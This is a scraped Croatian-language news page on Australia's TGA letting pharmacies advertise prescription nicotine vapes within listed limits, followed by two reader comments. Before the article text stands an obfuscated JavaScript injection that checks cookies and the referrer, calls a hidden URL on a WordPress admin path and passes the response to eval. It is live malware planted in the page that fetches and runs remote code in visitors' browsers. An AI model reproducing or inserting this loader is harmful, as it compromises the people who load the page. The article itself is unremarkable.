;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Australija: Vape oglasi dopušteni u ljekarnama u određenim okolnostima

Kako se propisi o prodaji e-cigareta od 1. listopada brzo približavaju, nova najava Uprave za terapeutsku robu (TGA) kaže da se ljekarnama koje prodaju e-cigarete ili e-tekućine na recept u nekim okolnostima može dopustiti oglašavanje proizvoda.

E-cigarete na recept

Godine 2020. australski savezni ministar zdravstva Greg Hunt najavio je novu mjeru zabrane uvoza tekućine za vape koja sadrži nikotin. Brojni javnozdravstveni stručnjaci, zagovornici smanjenja štete od duhana i zastupnici izjasnili su se protiv ove mjere što je dovelo do toga da je stavljena na čekanje.

Međutim, ranije ove godine TGA je objavila da će prodaja proizvoda biti ograničena na ljekarne putem recepta: “Uvoz nikotinskih e-cigareta i tekućeg nikotina za vaping zahtijevat će liječnički recept. To je u skladu s trenutnim domaćim ograničenjima prema državnom i teritorijalnom zakonu, koji zabranjuju opskrbu e-cigaretama koje sadrže nikotin u Australiji bez valjanog liječničkog recepta.”

U međuvremenu, najnovija objava daje farmaceutima dopuštenje za ‘ograničeno predstavljanje’ ovih proizvoda. TGA kaže: “Općenito, nije zakonito oglašavati lijekove na recept. Međutim, TGA je dao zakonsko dopuštenje koje omogućuje ljekarnama i marketinškim grupama ljekarni da putem određenih medija oglašavaju (tj. promoviraju) gdje nabaviti nikotinske e-cigarete i tekući nikotin na recept”.

“To znači da će pacijenti kojima je prepisan tekući nikotin za prestanak pušenja znati gdje mogu ispuniti recepte”, nastavlja se u priopćenju. “Ljekarna koja izdaje nikotinske e-cigarete ili tekući nikotin na recept može, u određenim okolnostima, promovirati onima koji žele ispuniti svoj recept da ima zalihe.”

Smjernice za Vape reklame

Članak o AJP-u sažeo je smjernice TGA na sljedeći način:

Mogu se koristiti informacije za pomoć javnosti u nabavi nikotinskih proizvoda za vaping kao što su:

 • mjesto na kojem su e-cigarete ili proizvodi za vaping nikotina dostupni na recept za pomoć pri prestanku pušenja
 • vrste nikotinskih proizvoda za vape koje su dostupne, na primjer nikotinske e-tekućine ili uređaji kao što su e-cigarete (uključujući e-cigarete koje podsjećaju na zapaljive cigarete, PODovi ili MODovi – međutim imajte na umu da trgovačka imena nisu dopuštena
 • dostupne koncentracije
 • je li otopina nikotina u obliku baze ili soli

Međutim, promocija ne smije:

 • biti napravljena pomoću radija ili televizije (uključujući streaming usluge)
 • biti promovirana na web stranicama ili bilo kojem drugom oglašavanju koje nije pod izravnom kontrolom ljekarne ili marketinške grupe ljekarne
 • biti promovirana od strane utjecajnih osoba na društvenim mrežama ili ambasadora robne marke
 • promovirati putem platformi društvenih medija koristeći plaćenu promociju
 • sadržati slikovne prikaze nikotinskih e-cigareta ili tekućeg nikotina
 • sadržati trgovačka imena
 • sadržati reference na okuse
 • izjave ili implikacije da vaping nije štetan ili je manje štetan od pušenja
 • sadržati izjave ili implikaciju da je opskrbljena e-cigareta superiornija od druge
 • poticati korisnike da uzimaju nikotinske e-cigarete
Tags:
Choose your Reaction!
 • I taman kad se ponadaš da su malo olabavili te krute propise u vezi Vapinga, vidiš da nije drek nego se pas posr’o.
  Pardon for my French, ali ovo je stvarno nonsense. Čuj to, možeš napraviti reklamu ali ustvari i ne možeš.
  Baš bih volio vidjeti kako će izgledati reklama koja je napravljena uz sva gore navedena ograničenja i smjernice.

  • Prema svemu navedenom reklama će izgledati nekako ovako (samo tekst jer slike su očito zabranjene):
   “Ovdje možete nabaviti e-cigarete i tekući nikotin ukoliko imate recept.”

Leave a Comment